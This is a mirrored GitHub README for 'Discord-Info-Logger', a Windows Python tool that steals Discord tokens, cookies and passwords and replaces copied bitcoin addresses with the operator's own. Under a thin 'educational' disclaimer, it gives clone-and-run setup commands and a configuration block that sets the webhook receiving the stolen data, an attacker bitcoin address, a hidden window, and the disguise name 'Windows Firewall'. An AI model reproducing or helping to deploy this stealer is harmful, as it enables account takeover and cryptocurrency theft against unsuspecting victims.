Giter VIP home page Giter VIP logo

discord-info-logger's Introduction

Discord-Info-Logger

A free, efficient, and open-source discord token logger, that also grabs cookies, passwords, and intercepts bitcoin addresses. This is purely for demonstration/educational purposes.

Setup

Depending on your python installation your commands may vary. Below are the commands needed to set up. The script was tested in python 3.8.6, on windows 10. This script only works on windows.

Windows:

git clone https://github.com/LocalsGitHub/Discord-Info-Logger.git
cd Discord-Info-Logger
pip install -r requirements.txt
py TokenLogger.py

Config

Once you have opened the script in your desired text editor, there are 3 lines that you can change.

# Configuration
BTC_ADDRESS = '3LsZH7LqxJMZBaVU9YoTLk8HNnUcmzE88v' <--- Change this to your own bitcoin address
webhookURL = "webhook" <--- Change this to your own webhook
hiddenWindow = False <--- Set this to True or False. If you want the window to be hidden on execution then set this to True
FakeFileName = "Windows Firewall" <--- Change this to the fake desired name.

Support

Create an issue, or message me on discord.

discord-info-logger's People

Contributors

ramin245 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.